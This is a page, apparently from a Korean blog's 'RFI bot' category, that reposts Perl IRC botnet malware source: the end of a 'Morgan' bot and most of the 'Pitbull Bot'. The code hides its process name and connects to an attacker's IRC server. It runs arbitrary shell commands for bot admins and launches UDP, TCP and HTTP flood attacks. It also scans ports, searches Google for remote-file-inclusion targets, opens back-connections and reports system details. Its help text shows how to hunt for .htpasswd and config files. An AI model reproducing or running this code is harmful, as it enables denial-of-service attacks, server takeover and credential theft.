             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
     close($socket);
             }
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP Flood15) (2Finished15) 15(2Victim7:12 ".$1."15)");
           }
           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP Flood15) 15(2Started15) (2Victim7:12 ".$1." 2Size7:12 ".$2." 7KB 2Time7:12 ".$3." 2seconds15)");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP Flood15) 15(2Finished15) 15(2Sent7:12 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 7KB 2in12 ".$dtime." 2seconds15) (2Victim7:12 ".$1."15)");
           }
           exit;
       }
  }
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   }
   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "15(7@2INFO15) (2No souch file/directory15)");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;

  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65000; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
       }
 }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(10)) * $n);
{
my @dominios = ("removed-them-all");
my @str;

foreach $dom  (@dominios)
{
    push (@str,"@gstring");
}

    my $query="www.google.com.ar/custom?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";
    my @lst=();
#sendraw("privmsg #Morgan :DEBUG only test googling: ".$query."");
    my $page = http_query($query);
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
    push (@lst,$1);
}
    }
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
    };

   return $page;
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com

# NOTE: DONT REMOVE COPYRIGHTS

'webhxxx > RFI bot' 카테고리의 다른 글

OWASP_Stealing_the_Airlines_Online_Data  (0) 2010.04.25
RFI BotNet관련문서  (0) 2010.04.25
Pitbull Bot  (0) 2010.04.18
FeeLCoMz RFI Scanner Bot v5.3  (0) 2010.04.18
fx29sh 3.3.03.09  (0) 2010.04.18
Posted by applicationlayer
:

Pitbull Bot

webhxxx/RFI bot 2010. 4. 18. 14:28 |
#!/usr/bin/perl
# Pitbull Bot
#
# Coded by : The_PitBull
#
# Thanks to :
# Ex0d3us for the Scanner
# r0x00k  for testing and helping
#
# Greets to :
# ASC @ irc.ascnet.biz
#
# Fuck you to :
# W8ting4u
# Morgan
#
#You can use the following commands :
#!bot @portscan <ip>
#!bot @back <ip><port>   
#!bot @udpflood <ip> <packet size> <time>
#!bot @tcpflood <ip> <port> <packet size> <time>
#!bot @httpflood <site> <time>
#!bot @linuxhelp
#!bot @multiscan <vuln> <dork>
#!bot @googlescan <vuln> <dork>
#!bot @system
#!bot @milw0rm
#!bot @join <#channel>   
#!bot @part <#channel>
#!bot @help
#!bot cd tmp for example
#
#
########################################################################################################################
# ______   __              ___    _   __    ___          __   __                                                       #
#/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
# / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
#/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
#                                                                                                                      #
########################################################################################################################

######################
use HTTP::Request;
use LWP::UserAgent;
######################
my $processo = '[httpds]';
######################


######################
#   Configuration    #
#                    #
############################################
my $linas_max='8';
#                                          #
# Maximum Lines for Anti Flood             #
############################################
my $sleep='5';
#                                          #                                     
#Sleep Time                                #
############################################
my @cmdstring='http://www.fuzi.by.ru/list.txt';
#                                          #
#CMD String                                #
############################################
my @adms=("FuZi^vL");
#                                          #
#Admins of the Bot set your nickname here  #
############################################
my @canais=("#fuzi");
#                                          #
#Put your channel here                     #
############################################
my @nickname = ("Priv8Scan");
my $nick = $nickname[rand scalar @nickname];
#                                          #
#Nickname of bot                           #
############################################
my $ircname ='YOurScan';
chop (my $realname = 'YourScan');
#                                          #
#IRC name and Realname                     #
############################################
$servidor='irc.fuzi.biz' unless $servidor;
my $porta='6667';
#                                          #
#IRCServer and port                        #
############################################
my $VERSAO = '11,1 Scan =] ';
#Dont Change                               #
############################################
#End of Configuration#
#                    #
######################
$SIG{'INT'} = 'IGNORE';
######################
$SIG{'HUP'} = 'IGNORE';
######################
$SIG{'TERM'} = 'IGNORE';
######################
$SIG{'CHLD'} = 'IGNORE';
######################
$SIG{'PS'} = 'IGNORE';
######################
use IO::Socket;
######################
use Socket;
######################
use IO::Select;
######################
chdir("/");
######################
########################################################################################################################
# ______   __              ___    _   __    ___          __   __                                                       #
#/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
# / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
#/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
#                                                                                                                      #
########################################################################################################################

#Connect
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Masalah fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
    print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
  my $meunick = $_[0];
  my $servidor_con = $_[1];
  my $porta_con = $_[2];
  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
  PeerPort=>$porta_con) or return(1);
  if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;
    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);
    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    sleep 1;
  }
}

my $line_temp;
while( 1 ) {
  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  delete($irc_servers{''}) if (defined($irc_servers{''}));
  my @ready = $sel_cliente->can_read(0);
  next unless(@ready);
  foreach $fh (@ready) {
    $IRC_cur_socket = $fh;
    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
      $sel_cliente->remove($fh);
      $fh->close;
      delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);
    for(my $c=0; $c<= $#lines; $c++) {

      $line = $lines[$c];
      $line=$line_temp.$line if ($line_temp);
      $line_temp='';
      $line =~ s/\r$//;
      unless ($c == $#lines) {
        parse("$line");
        } else {
        if ($#lines == 0) {
          parse("$line");
          } elsif ($lines[$c] =~ /\r$/) {
          parse("$line");
          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
          parse("$line");
                 } else {
                             $line_temp = $line;
        }
      }
    }
  }
}

sub parse {
  my $servarg = shift;
  if ($servarg =~ /^PING \:(.*)/) {
    sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
    if ($args =~ /^\001VERSION\001$/) {
           notice("$pn", "\001VERSION mIRC v6.17 PitBull\001");
    }
    if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
    if ($onde eq "$meunick"){
    shell("$pn", "$args");
  }

  #End of Connect

  ########################################################################################################################
  # ______   __              ___    _   __    ___          __   __                                                       #
  #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
  # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
  #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
  #                                                                                                                      #
  ########################################################################################################################

  ######################
  #      PREFIX        #
  #                    #
  ######################
  # You can change the prefix if you want but the commands will be different
  # The standard prefix is !bot if you change it into !bitch for example
  # every command will be like !bitch @udpflood, !bitch @googlescan.
  # So its recommended not to change this ;)
  ######################

  if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
    my $natrix = $1;
    my $arg = $2;
    if ($arg =~ /^\!(.*)/) {
      ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
      } elsif ($arg =~ /^\@(.*)/) {
      $ondep = $onde;
      $ondep = $pn if $onde eq $meunick;
      bfunc("$ondep","$1");
      } else {
      shell("$onde", "$arg");
    }
  }
}
}
######################
#   End of PREFIX    #
#                    #
######################

elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
  $meunick=$4;
  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
  sendraw("JOIN $canal ddosit");
}
}
}

sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
  exit;
} else {

######################
#       Help         #
#                    #
######################

if ($funcarg =~ /^help/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 PitBull BOT Help");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Select the function you want help for");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@ddos");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@rfiscan");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@backconnect");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@shell");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscanner");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Or if you want too know all the commands type:");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@commands");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan Help");

}

if ($funcarg =~ /^ddos/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 There are 3 DDossers in this bot");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 UDPFlood, HTTPFlood and TCPFlood");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@udpflood <ip> <packet size> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@tcpflood <ip> <port> <packet size> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@httpflood <site> <time>");

}

if ($funcarg =~ /^rfiscan/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 This bot also contains a RFI Scanner.");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You have multiengine scan that contains :12G4o8o12g9l4e4,2Altavista4,7All7The7Web4,14A4S14K4 and 7AOL  ");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Or you can just scan with google ");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Commands :");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@multiscan <vuln> <dork>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@googlescan <vuln> <dork>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can find strings here : http://www.xshqiptaretx.org/strings.txt ");

}

if ($funcarg =~ /^backconnect/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You use backconnect like this :");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@back <ip><port>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan ");
}

if ($funcarg =~ /^shell/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 This bot has a integrated shell");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can use it in private but also public in the channel");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 In public channel just use : 7!bot cd tmp12 for example");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 For help with the linux commands type :!bot 7@linuxhelp");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan ");

}

if ($funcarg =~ /^portscanner/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 The portscanner is very easy to use just type the following :");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscan <ip>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan ");
}

if ($funcarg =~ /^commands/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can use the following commands :");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscan <ip>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@back <ip><port>");   
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot cd tmp 12 for example");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@udpflood <ip> <packet size> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@tcpflood <ip> <port> <packet size> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@httpflood <site> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@linuxhelp");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@multiscan <vuln> <dork>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@googlescan <vuln> <dork>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@system");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@milw0rm");   
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@join #channel");   
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@part #channel");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan ");
}

if ($funcarg =~ /^linuxhelp/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Dir where you are : pwd");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Start a Perl file : perl file.pl");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Go back from dir : cd ..");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Force to Remove a file/dir : rm -rf file/dir;ls -la");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Show all files/dir with permissions : ls -lia");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find config.inc.php files : find / -type f -name config.inc.php");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all writable folders and files : find / -perm -2 -ls");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all .htpasswd files : find / -type f -name .htpasswd");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all service.pwd files : find / -type f -name service.pwd");
}

######################
#   End of  Help     #
#                    #
######################

######################
#     Commands       #
#                    #
######################

if ($funcarg =~ /^system/) {
  $uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Info BOT : 7 Servidor :Hiden : 6667");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uname -a     : 7 $uname");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uptime       : 7 $uptime");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Prosses  : 7 $processo");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12ID           : 7 $id");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Dir      : 7 $ownd");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12OS           : 7 $distro");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Owner        : 7 The_PitBull");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Channel      : 7 #pitbull");
}

if ($funcarg =~ /^milw0rm/) {
      my @ltt=();
      my @bug=();
      my $x;
      my $page="";
      my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
      print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
      my @r = <$socke>;
      $page="@r";
      close($socke);
      while ($page =~  m/<title>(.*)</g){
      $x = $1;
      if ($x =~ /\&lt\;/) {
        $x =~ s/\&lt\;/</g;
        }
        if ($x !~ /milw0rm/) {
          push (@bug,$x);
          }}
          while ($page =~  m/<link.*expl.*([0-9]...)</g) {
            if ($1 !~ m/milw0rm.com|exploits|en/){
            push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
            }}
                sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:9milw0rm12:.4|12 Latest exploits :");
            foreach $x (0..(@ltt - 1)) {
                  sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:9milw0rm12:.4|12  $bug[$x] - $ltt[$x]");
              sleep 1;
          }}
          ########################################################################################################################
          # ______   __              ___    _   __    ___          __   __                                                       #
          #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
          # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
          #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
          #                                                                                                                      #
          ########################################################################################################################
          ######################
          #      Portscan      #
          #                    #
          ######################

          if ($funcarg =~ /^portscan (.*)/) {
            my $hostip="$1";
            my
            @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
            my (@aberta, %porta_banner);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 Scanning for open ports on 4".$1." 12 started .");
            foreach my $porta (@portas)  {
              my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
              'tcp', Timeout => 4);
              if ($scansock) {
                push (@aberta, $porta);
                $scansock->close;
              }
            }

            if (@aberta) {
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 Open ports founded: @aberta");
              } else {
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 No open ports foundend.");
            }
          }

          ######################
          #  End of  Portscan  #
          #                    #
          ######################
          ########################################################################################################################
          # ______   __              ___    _   __    ___          __   __                                                       #
          #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
          # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
          #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
          #                                                                                                                      #
          ########################################################################################################################
          ######################
          #  Join And Part     #
          #                    #
          ######################
          if ($funcarg =~ /^join (.*)/) {
            sendraw($IRC_cur_socket, "JOIN ".$1);
          }
          if ($funcarg =~ /^part (.*)/) {
            sendraw($IRC_cur_socket, "PART ".$1);
          }
                    
          ######################
          #End of Join And Part#
          #                    #
          ######################
          ########################################################################################################################
          # ______   __              ___    _   __    ___          __   __                                                       #
          #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
          # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
          #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
          #                                                                                                                      #
          ########################################################################################################################
          ######################
          #     TCPFlood       #
          #                    #
          ######################

          if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4TCP DDos12:.4|12 Attacking 4 ".$1.":".$2." 12for 4 ".$3." 12seconds.");
            my $itime = time;
            my ($cur_time);
            $cur_time = time - $itime;
            while ($3>$cur_time){
            $cur_time = time - $itime;
            &tcpflooder("$1","$2","$3");
          }
          sendraw($IRC_cur_socket,"PRIVMSG $printl :4|12.:4TCP DDos12:.4| 12Attack done 4 ".$1.":".$2.".");
        }
        ######################
        #  End of TCPFlood   #
        #                    #
        ######################
        ########################################################################################################################
        # ______   __              ___    _   __    ___          __   __                                                       #
        #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
        # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
